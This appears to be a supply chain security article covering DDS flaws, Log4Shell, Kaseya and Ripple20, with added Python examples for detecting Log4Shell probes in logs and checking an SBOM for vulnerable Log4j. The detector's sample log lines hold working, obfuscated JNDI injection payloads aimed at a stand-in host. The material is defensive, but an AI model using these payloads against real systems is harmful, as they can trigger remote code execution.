Improving Software Supply Chain Security
Consider these key attack vectors:
Data Distribution Service (DDS)
DDS is a machine-to-machine middleware standard for publish-subscribe communication in real-time and embedded systems. Maintained by the Object Management Group (OMG), DDS implements the communication layer that carries data between sensors, controllers, and actuators. Because it sits at the very bottom of the stack, it is easy to lose sight of, and that makes it an attractive target for malicious actors.
In January 2022, Trend Micro Research, TXOne Networks, and ZDI, in collaboration with ADLINK Labs and Alias Robotics, published research disclosing 13 new vulnerabilities across the six most widely used DDS implementations. They found that these bugs affect not only DDS itself but also the systems and frameworks built on top of it.
DDS vulnerabilities fall into two groups: those in the network layer and those at the configuration level. The former can be exploited for denial-of-service (DoS), spoofing, and automated collection of data from a running system. Configuration-level vulnerabilities, by contrast, can be used to target the developers and integrators who build on DDS.
Open source code
Most commonly, developers pull open source code from public repositories such as GitHub to obtain everyday components. Why spend valuable time writing code to, say, move a message from one field to another when someone else has already done it? That convenience is why an estimated 90% of modern applications contain open source code.
However, the unvetted nature of open source code can lead to crippling incidents such as Log4Shell, the critical flaw in Apache Log4j, a widely used open source logging library. The vulnerability (CVE-2021-44228) allowed attackers to compromise vulnerable systems with a single injected string: Log4j resolved attacker-controlled lookups inside logged data and fetched and executed remote code through JNDI. The FDA warned that the flaw could affect medical devices and the software that supports them, and Log4j's reach follows from Java's, which is estimated to run on upwards of three billion devices.
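As an added illustration that is not part of the original article or of Log4j itself, the Python below shows the check a defender would run over web-server access logs after Log4Shell: it resolves the nested lookup syntax attackers used to hide the `${jndi:...}` trigger (`${lower:...}`, `${upper:...}`, and the `:-` default-value form) before matching, so the obfuscated variants are caught along with the plain one. The log lines and addresses are constructed for the example.

```python
import re
from typing import List

# An innermost Log4j lookup: "${...}" whose body contains no further "${", "{" or "}".
INNER = re.compile(r"\$\{([^${}]*)\}")
# What we ultimately look for once obfuscation has been resolved.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Lookups we cannot (or must not) resolve are re-emitted with this marker so the
# loop in normalize() terminates; it is turned back into "${" at the end.
FROZEN = "$\x01{"


def _resolve(body: str) -> str:
    """Resolve one innermost lookup the way the obfuscations rely on it being resolved.

    Case-transform lookups return their argument, and any lookup carrying the ':-'
    default syntax collapses to that default. A jndi lookup, or anything unknown,
    is frozen in place so the outer pattern is still visible to the final check.
    """
    name, _, arg = body.partition(":")
    name = name.strip().lower()
    if name == "jndi":
        return FROZEN + body + "}"
    if ":-" in body:  # "${env:NOPE:-j}" and "${::-j}" both evaluate to "j"
        return body.split(":-", 1)[1]
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    return FROZEN + body + "}"


def normalize(line: str) -> str:
    """Repeatedly resolve innermost lookups until nothing resolvable is left."""
    prev = None
    while prev != line:
        prev = line
        line = INNER.sub(lambda m: _resolve(m.group(1)), line)
    return line.replace(FROZEN, "${")


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return JNDI.search(normalize(line)) is not None


def scan(lines: List[str]) -> List[str]:
    """Return the lines that carry a JNDI lookup."""
    return [line for line in lines if is_log4shell_probe(line)]


# Constructed sample access-log lines (198.51.100.0/24 and 203.0.113.0/24 are
# documentation address ranges, not real hosts).
SAMPLE_LOG = [
    '198.51.100.4 "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.4 "GET /login HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '198.51.100.9 "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.7/x}"',
    '198.51.100.9 "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi:rmi://203.0.113.7/y}"',
    '198.51.100.9 "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.7/z}"',
    '198.51.100.4 "GET /health HTTP/1.1" 200 "config=${env:APP_ENV}"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("JNDI lookup:", hit)
```

Signatures that match only the literal string `${jndi:` miss the four obfuscated forms above, which is why the normalization step comes first. When hunting, run this over the raw request headers and query strings as they were logged, not over parsed fields, since the payload arrives in whatever input the application happened to log.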
System management tools
Version control and release-management systems handle the actual build, release, and deployment processes. Once in production, third-party and open source platforms host the application. While the system is running, automated operations tools handle the routine business of maintaining service levels, starting and stopping scheduled jobs, and rolling out updates. Together, this suite of systems-management tools keeps production running smoothly and resources optimized.
Kaseya VSA, a popular IT management product, was hit with a REvil ransomware attack in July 2021. The attackers exploited vulnerabilities in on-premises VSA servers and pushed the ransomware to the endpoints the software managed, disguised as a management-agent update. The damage extended well beyond the virtual world: the Swedish supermarket chain Coop was forced to close roughly 800 stores for almost a week.
Purchased applications
Developers also buy commercial software products for tasks such as updating a database, templating a web page, testing, and so on. These products carry their own vulnerabilities, as with Ripple20, a set of 19 zero-day vulnerabilities discovered by JSOF in a widely used low-level TCP/IP library developed by Treck, Inc.
The impact of Ripple20 was magnified by the supply chain, demonstrating how a single vulnerable component can ripple outward to affect a wide range of industries, applications, and companies, including Fortune 500 multinationals. JSOF reported that the library's spread through the supply chain left hundreds of millions of devices affected.
Improving software supply chain security
Evidently, the software supply chain can be attacked at multiple points, which makes securing it increasingly complex. To help organizations strengthen their defenses, CISA published ICT SCRM Essentials, which recommends six key steps for building an effective supply chain risk management practice:
- Identify: Determine who needs to be involved
- Manage: Develop your supply chain security policies and procedures based on industry standards and best practices, such as those published by NIST
- Assess: Understand your hardware, software, and services that you procure
- Know: Map your supply chain to better understand what components you procure
- Verify: Determine how your organization will assess the security culture of suppliers
- Evaluate: Establish timeframes and systems for checking supply chain practices against guidelines
To get the most from CISA’s framework, make sure your current security tools and vendors don’t slow down or add barriers at any of these steps. For example, you need comprehensive visibility: not only to discover and record every part of your digital attack surface, track updates and patches, and learn normal traffic patterns, but also to map every vendor or third party that has access to your data and assets. That level of visibility is the precondition for any specific mitigation, especially as the digital attack surface keeps widening.
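The Assess and Know steps above (understand what you procure, map the supply chain) are what a software bill of materials (SBOM) makes concrete, and the Log4j case earlier on this page is exactly where one pays off. The Python below, added here as an example and not taken from CISA or the article, walks a CycloneDX-style SBOM, checks each component against an advisory table, and reports the dependency chain through which each affected component was pulled in, so a team can see which direct dependency is responsible. The SBOM, the `example/` package names, and the advisory-table structure are constructed for illustration; only the log4j-core coordinate and the CVE-2021-44228 entry for it are real.

```python
import json
import re
from collections import deque
from typing import Dict, List, Optional, Tuple

# Constructed CycloneDX-style SBOM for a hypothetical "orders-api" service.
# Packages under "example/" are invented; the log4j coordinates are real.
SBOM_JSON = r"""
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "metadata": {
    "component": {"bom-ref": "pkg:maven/example/orders-api@1.2.0",
                  "name": "orders-api", "version": "1.2.0"}
  },
  "components": [
    {"bom-ref": "pkg:maven/example/web-framework@3.1.0",
     "purl": "pkg:maven/example/web-framework@3.1.0", "name": "web-framework", "version": "3.1.0"},
    {"bom-ref": "pkg:maven/example/json-lib@4.0.0",
     "purl": "pkg:maven/example/json-lib@4.0.0", "name": "json-lib", "version": "4.0.0"},
    {"bom-ref": "pkg:maven/example/logging-bridge@1.0.2",
     "purl": "pkg:maven/example/logging-bridge@1.0.2", "name": "logging-bridge", "version": "1.0.2"},
    {"bom-ref": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1",
     "purl": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1", "name": "log4j-api", "version": "2.14.1"},
    {"bom-ref": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1",
     "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1", "name": "log4j-core", "version": "2.14.1"}
  ],
  "dependencies": [
    {"ref": "pkg:maven/example/orders-api@1.2.0",
     "dependsOn": ["pkg:maven/example/web-framework@3.1.0", "pkg:maven/example/json-lib@4.0.0"]},
    {"ref": "pkg:maven/example/web-framework@3.1.0",
     "dependsOn": ["pkg:maven/example/logging-bridge@1.0.2"]},
    {"ref": "pkg:maven/example/logging-bridge@1.0.2",
     "dependsOn": ["pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1",
                   "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"]}
  ]
}
"""

# Advisory table: versionless purl -> list of (advisory id, first affected, first fixed).
# The single entry is real (Log4Shell, fixed in 2.15.0); the table itself is a
# constructed stand-in for a feed such as OSV or the NVD that you would load instead.
Advisory = Tuple[str, str, str]
ADVISORIES: Dict[str, List[Advisory]] = {
    "pkg:maven/org.apache.logging.log4j/log4j-core": [("CVE-2021-44228", "2.0", "2.15.0")],
}


def parse_version(v: str) -> Tuple[int, ...]:
    """Numeric major.minor.patch, ignoring pre-release suffixes such as '-beta9'."""
    nums = [int(x) for x in re.findall(r"\d+", v.split("-")[0])]
    return tuple((nums + [0, 0, 0])[:3])


def is_affected(version: str, first: str, fixed: str) -> bool:
    """True when first <= version < fixed under the simple numeric ordering above."""
    return parse_version(first) <= parse_version(version) < parse_version(fixed)


def dependency_path(sbom: dict, target: str) -> Optional[List[str]]:
    """BFS from the root component over the SBOM dependency graph; returns the
    chain of bom-refs that pulls `target` in, or None if it is unreachable."""
    root = sbom["metadata"]["component"]["bom-ref"]
    edges = {d["ref"]: d.get("dependsOn", []) for d in sbom.get("dependencies", [])}
    parent: Dict[str, Optional[str]] = {root: None}
    queue = deque([root])
    while queue:
        node = queue.popleft()
        if node == target:
            path = []
            while node is not None:
                path.append(node)
                node = parent[node]
            return path[::-1]
        for child in edges.get(node, []):
            if child not in parent:
                parent[child] = node
                queue.append(child)
    return None


def find_vulnerable(sbom_text: str,
                    advisories: Dict[str, List[Advisory]] = ADVISORIES) -> List[dict]:
    """Match every component's versionless purl against the advisory table and
    attach the dependency path for each hit."""
    sbom = json.loads(sbom_text)
    findings = []
    for comp in sbom.get("components", []):
        base = comp.get("purl", "").rsplit("@", 1)[0]
        for adv_id, first, fixed in advisories.get(base, []):
            if is_affected(comp["version"], first, fixed):
                findings.append({"component": comp["bom-ref"], "advisory": adv_id,
                                 "path": dependency_path(sbom, comp["bom-ref"])})
    return findings


if __name__ == "__main__":
    for f in find_vulnerable(SBOM_JSON):
        print(f["advisory"], "via", " -> ".join(f["path"]))
```

The path in the output is the actionable part: log4j-core is not a direct dependency of the service, so the fix is either to bump the transitive dependency through the direct one that pulls it in or to pin the patched version explicitly, and the same walk tells you which vendor or team owns that direct dependency. The version comparison here is deliberately simple; a production check should use the ecosystem's own version-range semantics.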
Look for a vendor with a unified cybersecurity platform that supports broad third-party integrations, ensuring total oversight from a single dashboard across the software supply chain. Security capabilities such as automation, continuous monitoring, and deep data collection and correlation are also vital to enabling faster detection, response, and remediation of affected supply chain components.